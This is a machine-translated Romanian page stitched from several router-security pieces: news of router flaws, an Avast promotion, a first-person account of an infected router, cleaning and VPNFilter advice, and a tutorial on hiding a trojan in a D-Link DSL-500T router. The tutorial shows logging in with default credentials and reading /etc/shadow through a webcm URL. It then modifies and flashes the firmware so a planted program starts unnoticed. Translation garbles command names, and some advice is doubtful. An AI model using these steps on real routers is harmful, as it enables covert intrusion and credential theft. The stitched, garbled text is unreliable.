Routerul poate prinde un virus? Cum să vă verificați routerul pentru viruși și să-l curățați: sfaturile noastre. Înregistrarea unei imagini de sistem de fișiere

Routerul dvs. este una dintre cele mai slabe verigi din securitatea dvs., iar cercetătorii au dovedit-o încă o dată.

Șaizeci de defecte de securitate au fost găsite în 22 de modele de routere din întreaga lume, majoritatea celor furnizate de furnizorii de servicii de internet. Aceste vulnerabilități ar putea permite hackerilor să pirateze dispozitive, să schimbe parole și să instaleze și să execute scripturi rău intenționate care schimbă serverele DNS. În acest fel, hackerii vă pot redirecționa către site-uri rău intenționate sau pot descărca cod rău intenționat pe computer atunci când vizitați pagini web oficiale.

De asemenea, vulnerabilitățile permit hackerilor să citească și să scrie informații pe dispozitivele de stocare USB conectate la un router compromis.

Studiul descrie modul în care atacatorii pot obține acces la computere - și anume, printr-o ușă din spate cu o parolă universală care este folosită de personalul furnizorului tehnic pentru a ajuta clienții de la distanță prin telefon. Acest al doilea acces cu drepturi de administrator este ascuns proprietarului routerului în mod implicit.

Ce modele de router au fost testate?

Cercetătorii au testat următoarele modele: Amper Xavi 7968, 7968+ și ASL-26555; Astoria ARV7510; Belkin F5D7632-4; cLinksys WRT54GL; Comtrend WAP-5813n, CT-5365, AR-5387un și 536+; D-Link DSL-2750B și DIR-600; Huawei HG553 și HG556a; ; Netgear CG3100D; Observa Telecom AW4062, RTA01N, Home Station BHS-RTA și VH4032N; Sagem LiveBox Pro 2 SP și Fast 1201 și Zyxel P 660HW-B1A.
Deoarece cercetătorii sunt din Madrid, ținta principală a cercetării lor au fost routerele furnizate de furnizorii de internet spanioli, dar Linksys, D-Link și Belkin sunt utilizate pe scară largă în Rusia și în alte țări.

Cum vă puteți proteja routerul?

Toate antivirușii Avast au o funcție încorporată Home Network Security (HNS) care scanează pentru rețele Wi-Fi prost configurate, indicând parole Wi-Fi slabe sau implicite, vulnerabilități în router, conexiuni la Internet piratate și protocol IPv6 activat, dar neprotejat. . Această caracteristică arată, de asemenea, o listă de dispozitive conectate la rețea, care vă va ajuta să controlați că numai dispozitivele pe care le cunoașteți sunt conectate la rețea. Avast este singura companie de securitate a informațiilor care oferă capacitatea de a proteja această zonă.

Cum să scanați routerul de acasă cu Home Network Security?

Deschideți interfața de utilizator Avast, faceți clic pe butonul Scanare din meniul din stânga, apoi selectați Scanarea amenințărilor de rețea.
Avast vă va scana routerul și va furniza un raport despre amenințările găsite. În majoritatea cazurilor, dacă este detectată o amenințare care necesită atenția dvs., Avast vă va direcționa către site-ul web al producătorului routerului.

Dragi cititori. Pentru a-ți economisi timpul. Să vorbim imediat despre principalul lucru. TOATE următoarele ajută în prezența troienilor sau virușilor pe computer timp de 5-7 zile. În această perioadă, scanările sunt trimise de pe Internet, dar DUPĂ hack se face o tăcere suspectă - nu există scanări - routerul infectat nu le mai permite să intre pe PC, acceptă comenzi și le execută. Acest lucru afectează viteza Internetului - scade.

Dacă routerul dvs. este deja infectat, atunci furtul de FTP, e-mail și alte parole se va întâmpla în viitorul apropiat.

Deja în 2009 cineva DroneBL a informat lumea despre (începutul?) epidemia de viruși care infectează routerele. Știrea lui a apărut după un atac asupra site-ului; administratorii acestui site au dezvăluit că acesta era un tip fundamental nou printre atacurile Ddos. Atacul a fost efectuat de routere infectate. Așa că acum, „familia” calculatoarelor zombie a câștigat o nouă adăugare - routerele zombie. A fost descoperită o rețea de botnet care consta din routere de acasă infectate! Ei au numit această rețea „psyb0t”. Așa a început oficial epidemia virusului routerului.

Hackingul are loc prin scanarea porturilor routerului și prin preluarea controlului asupra acestuia. Din păcate, există articole pe Internet despre cum acest sau acel model de router este cel mai ușor de piratat. Dar aici puteți afla cum să vă protejați de acest dezastru. După stabilirea controlului asupra routerului, a început să spioneze conținutul traficului care trecea. Furtul parolei. Alăturarea activității generale rău intenționate a rețelelor botnet de pe Internetul mondial. Scanează porturile computerului tău de acasă, dar voi intra în mai multe detalii aici. Autorul a reușit să descopere că a avea o conexiune de rețea la un router piratat duce la astfel de probleme. Când reinstalați firewall-ul, virușii apar din senin în sistem. Când încercați să instalați Debian sau Ubuntu în timp ce descărcați simultan actualizări în timpul procesului de instalare, aceste sisteme nu s-au instalat corect. Și anume

1. Este imposibil să lansați Firestarter-ul instalat - funcția administrativă este lansată și gata. adică, ceva este lansat cu privilegii de administrator, dar ceea ce este necunoscut. Firestarter pur și simplu nu pornește.
2. Dacă există o conexiune la internet, Deadbeef NU pornește; când opriți routerul, acesta se pornește imediat.
3. Unele aplicații care necesită privilegii de administrator sunt lansate fără a cere o parolă, altele nu pornesc deloc.
4. De când am scris acest articol, aceste puncte au devenit mai puțin pronunțate. Adică vor fi probleme, dar vor Arăta altfel.

Reinstalarea PE ACELAȘI computer, DE PE ACEEAȘI disc de instalare, cu routerul OPRIT, a avut succes. Sistemul (testat pe Ubuntu) a funcționat ca un ceas. Acest lucru nu este surprinzător, deoarece routerele care rulează sistemul de operare Linux Mipsel au fost primele care au fost vulnerabile. Desigur, răul care vine de la un router zombi este „mai variat” decât am observat și descris aici, dar în ce suntem bogați în prezent, asta împărtășim...

Windows-ul instalat (cu routerul infectat dezactivat) „a supraviețuit”, dar Agnitum Outpost Firewall Pro a detectat scanările de porturi încă din primele minute după instalare. Acestea. Routerul atacă porturile.

Orez. Scanarea porturilor mele de pe Internet și în final de pe routerul infectat.

După cum puteți vedea în figură, pe 27.04.2017 la ora 23:51:16 scanarea a avut loc de pe routerul zombie. Înainte de aceasta, au existat scanări de la Kaspersky Security Network - 130.117.190.207 (firewall-ului nu le „place”, dar aceasta este norma când este instalat Kaspersky) și nu este clar unde. Și pe 27.04.12, setările routerului au fost resetate la setările din fabrică (Huawei HG530). De atunci, acestea provin doar din Kaspersky Security Network - 130.117.190.207 și ARP_UNWANTED_REPLY - autorul a activat filtrarea ARP. Prin urmare, încercările routerului de a „vorbește” din nou cu computerul (aceasta este activitatea normală a routerului - dar acum Agnitum trece doar acele răspunsuri ARP care vin ca răspuns la o solicitare de la computerul meu), precum și încercările unor persoane pentru a intercepta traficul folosind un răspuns ARP fals sunt blocate de firewall. Dacă cineva îmi interceptează traficul în acest fel și îl trece prin computerul său, atunci voi fi în rolul unui angajat de birou care folosește internetul, în timp ce administratorul de sistem al acestei întreprinderi vede toate acțiunile mele, întocmind un raport detaliat pentru șef. . Câte scrisori au fost scrise (cui, despre ce), câte au discutat pe ICQ. Desigur, parolele de e-mail etc. Îl pot fura și ei.

Rezultatul este că din momentul în care îmi resetez routerul și am făcut ceea ce descriu mai jos, nu există atacuri de pe Internet. „Gunnerul” a fost eliminat, routerul este curat și face DOAR ceea ce a fost conceput. Dar troianul de pe PC trebuie și el eliminat, altfel va duce hackeri la IP-ul tău.

Cei care fac echipamente de retea nu ofera masuri de securitate. Instrucțiunile pentru routere conțin o descriere a modului de introducere a login-ului și a parolei pentru accesarea furnizorului, dar nu există niciun cuvânt că parola implicită de administrator nu poate fi lăsată în router! În plus, routerele au în mod necesar elemente de control de la distanță, care sunt adesea pornite. Producătorii de software antivirus sunt tăcuți. Se pune inevitabil întrebarea: cine beneficiază de asta?

Căile de infectare.

Este mai bine să-l vezi o dată. Din acest motiv, ofer o animație GIF cu o analiză schematică a situației. Dacă nu este vizibil, atunci Adblock sau ceva similar interferează - dezactivați-l pe această pagină.

Sunt doi dintre ei. Primul este prin WAN, alias Internetul. Acestea. hackerii vă găsesc IP-ul, de exemplu, atunci când descărcați sau distribuiți fișiere folosind protocolul torrent (mai multe despre asta la sfârșitul articolului) și prin scanarea IP-ului dvs. găsesc puncte slabe în securitatea routerului. Dar acest lucru este mai puțin frecvent. Cum să închidem aceste porți citim mai departe în acest articol.

Sau, există un troian pe computerul nostru. Și așa îi conduce pe hackeri către IP-ul nostru dinamic (!). Cunoscând această adresă, deja pirata metodic routerul. Citim despre troieni în a doua cale de infectare.

Al doilea este prin LAN, adică de pe computer. Dacă există un troian pe computerul dvs., atunci hackerii vor putea ghici parola routerului direct de pe computer. Prin urmare, această parolă trebuie schimbată uneori. Dar cum rămâne cu faptul că un computer infectat va încerca să pirateze routerul dintr-o parte care nu este protejată? În primul rând, trebuie să înțelegeți că un router curat cu un computer infectat nu va dura mult. Forța brută obișnuită (ghicirea parolei) o va sparge într-o săptămână sau chiar mai repede. Deci, dacă trebuie să vă curățați ruterul des, este timpul să vă gândiți la curățarea completă a acestuia de viruși.

Și acum momentul. De unde vine virusul/troianul de pe PC? Am enumerat principalele motive și soluții între paranteze. Opțiunile sunt:

1 - a fost instalat Windows crăpat inițial (utilizați discuri de instalare goale);

2 - Windows curat a fost spart după instalare (fie suportați și reinstalați-l lunar, fie cumpărați Windows);

3 - software crack (utilizați programe gratuite sau cumpărați programe plătite);

4 - aveți un virus în fișierele personale (rulați toate fișierele personale prin curățare, așa cum am descris la curățarea sistemului de viruși);

5 - sistemul este infectat deja în timpul utilizării printr-o unitate flash, Internet, cine știe cum (protecție - studiem Internetul într-un mod sigur, despre unitățile flash, voi păstra tăcerea despre ultimul punct).

Separat, observ că, după ce au descoperit IP-ul routerului, hackerii încep să-l scaneze pentru a găsi acces la parola criptată și apoi preia controlul folosind parola furată. Deci, nu lăsați routerul pornit dacă nu aveți nevoie de acces la Internet chiar acum.

DAR!!! Chiar dacă porniți folosind o mașină virtuală, acestea vor începe să vă blocheze routerul. Dezactivarea și reactivarea acestuia în timpul procesului va ajuta aici, iar LUCRU PRINCIPAL după ce ați terminat descărcarea torrentului este că, după repornire, furnizorul va oferi routerului un nou IP dinamic, iar hackerii nu vor trebui decât să ghicească la ce adresă vă aflați acum. . Și routerul dvs., de asemenea... Desigur, nu veți rămâne cu distribuțiile - după ce descărcarea este finalizată, ar trebui să opriți imediat programul de descărcare torrent și DUPĂ aceasta, opriți și porniți routerul.

Și în general vorbind

NU ȚINEȚI ROUTERUL PORNIT DECÂT DACĂ AI NEVOIE! Nu lăsați micii hackeri să vă acceseze proprietatea din nou... Nu uitați să vă curățați routerul de fiecare dată când viteza conexiunii la internet scade nerezonabil. Atenția nu va strica...

Asta este. Acum puteți lua instrucțiunile din fabrică pentru routerul dvs. și puteți specifica datele de conectare și parola emise de furnizorul dvs. de internet. Acest lucru se face de obicei în fila Setări WAN. Acum nu vă veți putea controla routerul prin Internet. Cel putin pentru moment.

Când distribuiți Internetul prin Wi-Fi printr-un router, pot apărea diverse probleme. De exemplu, încetinirile și ping-ul ridicat pot apărea din cauza infectării echipamentelor de distribuție cu viruși. Să aruncăm o privire mai atentă la cum să curățați singur routerul.

Simptome

Echipamentul poate fi infectat cu următoarele tipuri de viruși:

• încetinirea vitezei de transfer de date. De exemplu, un virus poate perturba setările, va exista viteză scăzută, pierderea semnalului etc.;
• înlocuirea adreselor site-urilor web. Se întâmplă așa: o persoană merge la o resursă, iar malware-ul schimbă DNS-ul, iar utilizatorul este redirecționat către un site cu publicitate sau devine vizibil pentru blocurile de publicitate plasate de proprietarii site-ului. Acest virus este, de asemenea, periculos, deoarece poate redirecționa către o resursă care conține alt conținut rău intenționat.

În orice caz, dacă routerul este instabil, este necesar să îl verificați pentru viruși, care sunt destul de ușor de îndepărtat.

Cum apare infecția?

Routerul distribuie internetul tuturor gadgeturilor conectate la acesta. Aceasta înseamnă că toate dispozitivele funcționează pe aceeași rețea locală. Virusul folosește asta: pătrunde în computer printr-un site web sau un fișier descărcat, apoi prin rețea ajunge la router, unde efectuează acțiuni rău intenționate.

Severitatea situației depinde de versiunea programului virus; de exemplu, unii dăunători se comportă în secret și încep să acționeze activ doar odată ce se află în router, în timp ce alții, dimpotrivă, pot deteriora simultan sistemul de operare.

Verificarea echipamentelor de rețea pentru infecție

Înainte de a vă curăța echipamentul de viruși, trebuie să verificați prezența lor pe router. Pentru a face acest lucru, trebuie să conectați cablul de Internet direct la portul computerului. Scoateți firul WLAN de la router și conectați-l la computer, apoi efectuați următoarele manipulări:

• Lansați browserul și deschideți mai multe site-uri. Asigurați-vă că conținutul lor este corect și că nu există nicio înlocuire de site-uri sau blocuri de publicitate. În scopuri de verificare, este mai bine să alegeți resurse în care publicitatea nu poate fi prezentă.
• Rulați un program antivirus pentru a vă scana computerul. Acest lucru este necesar pentru a determina calea infecției - de pe computer sau de pe router. Rețineți că pot exista mai mulți viruși, iar aceștia pot fi prezenți atât în ​​sistem, cât și în echipamentele de rețea.

Îndepărtarea virusului

Urmăriți un videoclip despre infectarea unui router cu viruși aici:

Pentru a elimina programul rău intenționat, trebuie să resetați setările la setările inițiale. Dacă un program viruși a afectat deja firmware-ul, va trebui să fie reinstalat.

Reseteaza setarile

Pentru a curăța routerul, trebuie să-i resetați setările:

• Găsiți butonul Resetare de pe spatele dispozitivului. Ea iese adesea în evidență față de ceilalți. Apăsați și mențineți apăsat până când routerul își resetează setările și repornește. Amintiți-vă că atunci când reporniți, toate setările se vor pierde, iar routerul va trebui configurat din nou.

• Pentru a configura routerul, trebuie să îl conectați la computer folosind un cablu, apoi să lansați un browser și să introduceți adresa 192.168.0.1. Poate fi diferit și este indicat pe router în sine sau în documentele sau instrucțiunile acestuia. La introducerea setărilor, administratorul de conectare este adesea introdus, iar parola este aceeași sau 12345. Dacă nu vă puteți autentifica, atunci ar trebui să vă uitați la instrucțiunile pentru echipamentul de rețea.

• Găsiți opțiuni de Setări rapide. Selectați toate care se aplică. De asemenea, puteți schimba parola și numele rețelei. După finalizarea procesului de configurare, salvați-le și reporniți routerul.

După parcurgerea tuturor pașilor descriși, verificați dacă ați reușit să scăpați de problemă. Dacă acest lucru nu funcționează, va trebui să re-flash echipamentul de rețea.

Cum se efectuează o clipire?

Se întâmplă ca un program de virus să schimbe firmware-ul routerului. Puteți neutraliza versiunea infectată prin flashing-o.

Conectați computerul la router printr-un fir LAN. Ar trebui să fie inclus cu orice router. Dacă nu este acolo, atunci puteți utiliza o conexiune Wi-Fi. Cu toate acestea, metoda de conectare prin cablu va fi de preferat.

După conectarea la router, lansați browserul și introduceți valoarea 192.168.1.1 (sau alta specificată pe dispozitiv) în câmpul de adresă, apoi va trebui să introduceți o parolă și să vă autentificați pentru a deschide setările routerului. Autentificarea și parola implicite sunt admin. Dacă nu puteți introduce setările, trebuie să aflați detaliile de conectare curente; poate că au fost modificate după ultima instalare.

Descărcați noua versiune de firmware de pe site-ul producătorului și, mergând la setările routerului, selectați-o pe discul computerului. Procesul de firmware pentru toate routerele este identic.

Protejarea echipamentelor de rețea de viruși

Pentru a vă proteja routerul împotriva infecțiilor, puteți utiliza următoarele recomandări:

• Actualizați firmware-ul la cea mai recentă versiune. Vizitați site-ul producătorului, introduceți modelul dvs. în căutare și descărcați cel mai recent firmware.
• Setați o valoare a parolei cu mai multe cifre pentru interfața web. Nu toate routerele vă permit să vă schimbați datele de conectare. Cu toate acestea, dacă setați o parolă complexă, piratarea interfeței web nu va mai fi ușoară.
• Setați conectarea offline în setările routerului.
• Schimbați adresa IP a routerului în acces local. În timpul procesului de hacking, virusul va contacta imediat adrese precum 192.168.0.1 și 192.168.1.1. Pe baza acestui lucru, este mai bine să schimbați al treilea și al patrulea octet al adresei IP rețelei locale.
• Instalați un program antivirus de încredere pe computer. Dacă un virus încearcă mai întâi să pătrundă în computerul dvs., acesta va fi eliminat imediat, împiedicându-l să dăuneze routerului.
• Nu stocați parole în browser.

După cum puteți vedea, verificarea ruterului pentru viruși și curățarea acestuia nu este dificilă. Dar este mai bine să urmați sfaturi simple pentru a preveni infecția. Dar dacă se întâmplă asta, știi ce să faci.

VPNFilter este o amenințare care afectează o mare varietate de modele de routere și de stocare atașată la rețea (NAS). VPNFilter poate colecta informații sensibile și poate interacționa cu traficul de rețea, precum și poate perturba funcționarea routerului. Acest program rău intenționat supraviețuiește cu calm unei reporniri a routerului.

Symantec oferă un instrument online gratuit pentru a verifica rapid routerul pentru infecții cu VPNFilter.

Informații importante

Instrumentul online verifică dacă dispozitivul dvs. a fost compromis de o componentă VPNFilter cunoscută sub numele de plugin-ul ssler. Dacă routerul dvs. nu este infectat cu pluginul ssler, acesta poate fi totuși compromis de alte amenințări sau componente VPNFilter.

Dacă sunteți îngrijorat sau bănuiți că routerul dvs. este infectat cu VPNFilter, ar trebui să urmați recomandările de mai jos.

Ce să faci dacă este infectat

Dacă sunteți îngrijorat că routerul dvs. este infectat cu VPNFilter, vă recomandăm să urmați acești pași:

1. Resetați routerul pentru a restabili setările din fabrică. Salvați mai întâi configurația routerului, deoarece va trebui să o reconfigurați ulterior.
2. Opriți și reporniți routerul. Vă rugăm să rețineți că pur și simplu repornirea routerului fără a efectua mai întâi o resetare din fabrică nu va elimina VPNFilter.
3. Schimbați parola de administrator pentru router cu una mai sigură. Dacă este posibil, deconectați-vă routerul de la Internet în timp ce efectuați acest pas.
4. Instalați cele mai recente actualizări și firmware pentru routerul dvs.

Bună, cititorul meu! În acest articol voi vorbi despre routere ADSL grozave
– bucăți de fier care sunt indispensabile în rețelele casnice și industriale. Îți voi spune despre întrebare
exploatarea acestor glande în scopuri benefice nouă – cusut în brutal
Troian în interiorul routerului. Și în așa fel încât nimeni să nu observe
un administrator inteligent, nu un utilizator inteligent.

Dorințe sau cerințe IQ

Când am scris acest articol, am presupus că citirea lui ar fi suficientă
utilizator avansat cu GNU\Linux instalat, care are și unele abilități
lucru și programare în acest sistem de operare. Cu toate acestea, se pare
este posibil să-mi repet pașii pe Windows (folosind Cygwin, de exemplu), dar
acest lucru nu va fi descris. Pentru a obține o plăcere maximă ai nevoie și de
abilități de fier de lipit (acest lucru este opțional).

Și totul a început...

Cumva m-am distras. Așadar, totul a început când același lucru a închis într-o zi
hardware sau, mai degrabă, a întrerupt în mod trădător conexiunea la Internet și nu a făcut-o
Am vrut să-l refac. În același timp, era departe, accesibilă fizic
Nu eram acolo să o văd (totuși, mințeam cumva - eram prea lene să mă ridic de pe canapea
reporniți routerul :)), interfața Web nu a răspuns, dar mi-am amintit asta
Acest lucru ar trebui să aibă telnet sau ssh. Conectați-vă în zona de administrare
nu am încercat până acum și nu am schimbat din nesăbuință parola contului meu (cum ar fi
S-a dovedit mai târziu, foarte degeaba, pentru că implicit este „admin:admin”). Deci eu
am încercat SSH și a funcționat!

$ssh [email protected]
$Parolă:

Ca un șurub din albastru! BusyBox! Nu m-am gândit niciodată sub al cui
Se pare că acest router este controlat – GNU/Linux! M-am simțit îngrozit
Mă întreb cum funcționează totul aici și, din punct de vedere mental, datorită lenei și întâmplării, eu
a intrat în cercetare.

Colectarea de informații

Deci de unde am început? Desigur, din lista de comenzi disponibile:

#busybox
...
Funcții definite în prezent:
[, frasin, busybox, pisică, chgrp, chmod, chown, cp, dată, dd, df, ecou, ​​fals, gratuit,
grep, nume de gazdă, id, ifconfig, init, insmod, kill, ln, autentificare, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, repornire, rm, rmmod, traseu, sh, somn,
sincronizare, gudron, testare, tftp, atingere, adevărat, tty, umount, wget, whoami, da

Setul este destul de rezonabil, suficient pentru cercetarea normală și implementarea ideilor.
Apoi, s-a trezit interesul pentru versiunea de kernel:

# cat /proc/version
Linux versiunea 2.4.17_mvl21-malta-mips_fp_le (root@xy) (gcc versiunea 2.95.3
20010315 (lansare/MontaVista)) #1 Thu Dec 28 05:45:00 CST 2006

Pentru referință: MontaVista este o distribuție care vizează embedded
sisteme. Marea majoritate a producătorilor de echipamente de rețea oferă
preferinta pentru acest sistem. Poate fi găsit și pe alte dispozitive, de exemplu, în
cărți electronice sau telefoane mobile.

# cat /etc/versions
CLIENT=DLinkRU
MODEL=DSL-500T
VERSIUNEA=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253

# cat /proc/cpuinfo
procesor
: 0
model CPU
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
așteptați instrucțiune: nu
temporizatoare de microsecunde: da
vector de întrerupere suplimentar: da
Punct de supraveghere hardware: da
Excepții VCED: nu sunt disponibile
Excepții VCEI: nu sunt disponibile

AR7 este un cip dual-core dezvoltat de Texas Instruments. El
conține un router ADSL cu drepturi depline pe un singur cip care acceptă standardele ADSL1,
ADSL2, ADSL2+. Bazat pe procesor RISC de înaltă performanță MIPS 4KEc, cu
frecvența ceasului 175 sau 233 (în funcție de tehnologia de producție: 18 microni
sau 13 µm). Cipul conține 2 interfețe UART la bord, dintre care una (UART_A)
folosit pentru a scoate informații de depanare, precum și o interfață EJTAG care servește
pentru depanare (firmware) Memorie flash. Se va discuta despre utilizarea acestor interfețe
descris mai jos.

În cele din urmă, m-am uitat la informațiile de memorie:

# cat /proc/mounts
/dev/mtdblock/0/squashfs ro 0 0
niciunul /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0

# cat /proc/mtd
dev: size erasesize nume
mtd0: 0034f000 00010000 „mtd0”
mtd1: 00090f70 00010000 „mtd1”
mtd2: 00010000 00002000 „mtd2”
mtd3: 00010000 00010000 „mtd3”
mtd4: 003e0000 00010000 „mtd4”

Desigur, fără a uita de adresele de bloc:

# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

Din cele de mai sus rezultă că memoria Flash (/dev/mtdblock) are 5 blocuri:

mtd0– imaginea sistemului de fișiere SquashFs. Acesta este un fișier special
un sistem care este comprimat și numai în citire. Pentru
Se folosește algoritmul de compresie gzip, dar în acest caz - LZMA (raportul de compresie
superior). Dimensiunea acestui bloc este de 4 MB.

mtd1– acest bloc conține nucleul MontaVista comprimat cu algoritmul LZMA
stare, dimensiune bloc 600 KB.

mtd2– Bootloader ADAM2, încarcă nucleul, are și el
Serviciu server FTP pentru recuperare și intermitent. Vor fi mai multe detalii despre asta
mai spus. Dimensiunea blocului este de 64 KB.

mtd3– împărțit între datele de configurare și mediu
(variabile de mediu), pe care îl puteți consulta în /proc/ticfg/env.
Datele de configurare se află în /etc/config.xml. Intermediar între dosar
sistem, blocul de configurare este închis (ca toate cm_*, control, o
ei mai târziu) programul cm_logic. Dimensiunea acestui bloc este, de asemenea, de 64 KB.

mtd4– acesta conține semnătura firmware-ului, nucleul și imaginea fișierului
sisteme. Acest bloc este utilizat la actualizarea firmware-ului prin interfața Web.
Inițial este stocat în acest bloc, apoi este verificată suma de control
și, dacă se potrivește, se înscrie pentru noul său loc.

RAM (16 MB la acest model, dar ADAM2 la acest model
vede doar 14 MB, este vindecat prin actualizare), montat în directorul /var și acesta
Îl puteți folosi cu ușurință în scopurile noastre:

#gratuit
totalul de buffere partajate gratuite utilizate
Mem: 14276 10452 3824 0

Să nu uităm să parcurgem lista de procese. Dintre cele interesante care pândesc aici
demoni: thttpd - Web-server; dproxy - serverul proxy care memorează în cache cererile DNS; ddnsd
- daemon DNS; pppd... este demonul real care implementează conexiunea prin protocol
PPP, iar în parametri vedem informații despre cont. Deci, dacă routerul nu este
se preface a fi un furtun (citește – nu în modul pod), atunci poți
ușor de obținut un cont.

Programele cm_* sunt închise și codul sursă include deja
compilate (aceste programe sunt dezvoltate și de Texas Instruments, pe D-Link
Nu are rost să ne certăm pentru nerespectarea licențelor).

cm_logic– un program care controlează logica sistemului, prin intermediul acestuia
configurarea este în curs de desfășurare; sincronizează /etc/config.xml cu
partea corespunzătoare a conținutului /dev/ticfg (indicând spre mtd3).

cm_cli– interfață de linie de comandă pentru management și configurare
sisteme. De exemplu, setările de conectare se fac prin această interfață.

cm_buc– lansează și monitorizează procese, conexiuni cu reguli
(de exemplu, rulați programul ca demon; regulile includ și informații despre
porturi deschise) descrise în /etc/progdefs.xml; incarca imediat dupa
miezuri.

webcm– Interfață CGI, care nu are, de exemplu, vă permite să vă uitați la /etc/shadow,
pur și simplu accesând adresa URL.

http://192.168.1.1/../../../etc/shadow

Nu am primit nimic, thttpd nu este atât de simplu, dar dacă da:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Alt lucru. Acesta poate fi folosit pentru a colecta informații dacă nu există acces la
ssh/telnet, dar există acces la interfața Web.

firmwarecfg– folosit pentru intermiterea firmware-ului prin interfața Web. La intrare
a acestui program, o imagine este transferată cu o solicitare POST din interfața Web și deja
redirecționează către memoria Flash după prima verificare a sumei de verificare a imaginii.

În acest moment, colectarea informațiilor primare este finalizată, este timpul să trecem la decisiv
actiuni.

Instalarea instrumentelor de dezvoltare și compilarea firmware-ului

Firmware pentru routerele D-Link (și toate celelalte bazate pe GNU/Linux)
distribuite sub licența GPL, le puteți obține pe site-ul oficial
server FTP. De fapt, puteți alege oricare din lista de firmware-uri propuse,
sunt aceleași (în ceea ce privește seria T). Livrarea include codul sursă al nucleului, al mediului,
instrumentele și lanțul de instrumente necesare pentru dezvoltarea/compilarea celor existente
programe. Ar trebui să fie despachetat la rădăcină și adăugat la variabila de mediu
Calea PATH către directorul bin toolchain:

$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/

Acum, pentru a compila propriul firmware, accesați directorul
cu codurile sursă și rulați aceeași marcă.

$ cd DSL/TYLinuxV3/src && make

Vor fi puse o mulțime de întrebări despre activarea suportului pentru dispozitive (mai bine
raspunde-le pozitiv). După ce compilarea este completă, în directorul TYLinuxV3/images
Vor fi create imagini cu firmware-ul. De asemenea, puteți rula un script cu același nume ca al dvs
model din directorul /TYLinuxV3/src/scripts.

Câteva cuvinte despre transferul fișierelor între router și computer. Chiar primul
metoda pe care am folosit-o este capacitatea de a transfera fișiere prin protocolul SSH,
folosind programul scp pentru aceasta. Dar puțin mai târziu am aflat că mc (Midnight
Commander) are și capacitatea de a se conecta prin SSH (Panel -> Conexiune Shell).
Alternativ, puteți configura un server Web sau FTP la locul de muncă. Mai tarziu eu
Am preferat serverul Web, pentru că funcționează cel mai repede. L-am instalat
thttpd, mic și rapid, la fel ca pe un router. Îl lansăm acasă și îl descarcăm pe
fișierul router, după ce ați accesat directorul /var (așa cum s-a menționat
mai devreme, disponibil pentru înregistrare).

$ thttpd -g -d ~/ForRouter -u utilizator -p 8080
# cd /var
# wget http://192.168.1.2/file

Pentru a descărca un fișier de pe router, puteți, de asemenea, să ridicați serverul web:

# thttpd -g -d /var -u root -p 8080

Vă rugăm să rețineți că, dacă doriți să descărcați un fișier executabil de pe router, ar trebui
elimina drepturile de lansare. Când descărcați un număr mare de fișiere de pe router
Este mai bine să utilizați mc, nu va trebui să copiați mai întâi fișierele în /var și
eliminați drepturile și apoi ștergeți aceste fișiere pentru a elibera spațiu. În general, chestiunea
gust, alege orice opțiune care este convenabilă pentru tine.

Crearea propriului program

Să începem, desigur, cu un clasic al programării - HelloWorld. Unele speciale
nu sunt reguli. Textul programului este dureros de familiar:

#include
#include

int main(void)
{
printf("Mate.Feed.Kill.Repeat.");
returnează 0;
}

Compilăm (calea către lanțul de instrumente trebuie specificată în variabila de mediu
CALE):

$ mips_fp_le-gcc iad.c -o iad
$ mips_fp_le-strip -s iadul

# cd /var
# chmod +x iad
# ./iad

Și... nu se va întâmpla nimic, sau va apărea notificarea calea negăsită. Ce este
caz? Am vorbit deja despre cm_pc - acest program lansează altele în
conform regulilor descrise în /etc/progdefs.xml. Acum a sosit momentul
modificați și flash imaginile sistemului de fișiere.

Modificarea sistemului de fișiere

Pentru a modifica sistemul de fișiere, mai întâi trebuie
despacheta. După cum am menționat deja, sistemul de fișiere de aici este SquashFs cu patch-ul LZMA.
Pachetul de dezvoltare a firmware-ului include doar programul mksquashfs (pentru crearea
imagine), unsquashfs (pentru despachetare) lipsește. Dar nu contează, totul este disponibil
pe site-ul sistemului de fișiere, avem nevoie de prima versiune. Prin aplicarea plasturelui LZMA și
După ce s-au adunat utilitățile, le-am pus deoparte într-un loc convenabil. Mai întâi obținem imaginea
sistem de fișiere de la router:

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs

Acum îl puteți modifica după cum doriți, iar noi îl putem trimite la FuckTheWorld
/bin și adăugați o regulă pentru a rula în /etc/progdefs.xml.

$ cp salut unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

Și adăugăm asta (între etichete ):

iad
/bin/iad

Salvați și împachetați înapoi:

$ mksquashfs unpacked_fs my_fs.img -noappend

Vă rugăm să rețineți că imaginea sistemului de fișiere nu trebuie să depășească
dimensiuni acceptabile. Dacă simți nevoia de a încerca ceva urgent, și nu
se potrivește, eliminați orice „inutil” din imagine, cum ar fi grep, whoami sau
utilizați pachetul de fișiere executabile UPX. Acum descărcați-l pe router
imagine și treceți la secțiunea următoare.

Înregistrarea unei imagini de sistem de fișiere

Metoda de flashing a unui router este foarte simplă; implică accesarea dispozitivului
/dev/mtdblock/*. Deci, încărcați imaginea fișierului pe router în orice mod convenabil.
sistem și efectuați această acțiune simplă:

# cat my_fs.img > /dev/mtdblock/0 && reporniți

# cp my_fs.img /dev/mtdblock/0 && reporniți

După ceva timp, când procesul de înregistrare s-a încheiat, routerul se va reporni și
modificările vor intra în vigoare. Să încercăm să rulăm exemplul nostru:

# iad
Mate.Feed.Kill.Repeat.

Metode de recuperare în caz de defecțiune

Înainte de a vă intermite routerul cu „articole” mai serioase, ar trebui să aflați cum
să acţioneze în cazurile critice când routerul refuză
sarcină. Nu există situații fără speranță. Serverul FTP ADAM2 vine în ajutor. Pentru
În primul rând, ar trebui să lansați un client FTP la adresa IP ADAM2, pe care o puteți spiona
în /proc/ticfg/env (parametrul my_ipaddress).

$ftp 192.168.1.199
220 ADAM2 FTP Server gata.
530 Vă rugăm să vă autentificați cu USER și PASS.

Pentru claritate, puteți activa modul de depanare, apoi totul
informații și toate răspunsurile FTP:

Autentificare/parolă – adam2/adam2. Procesul de intermitent este foarte simplu. A începe
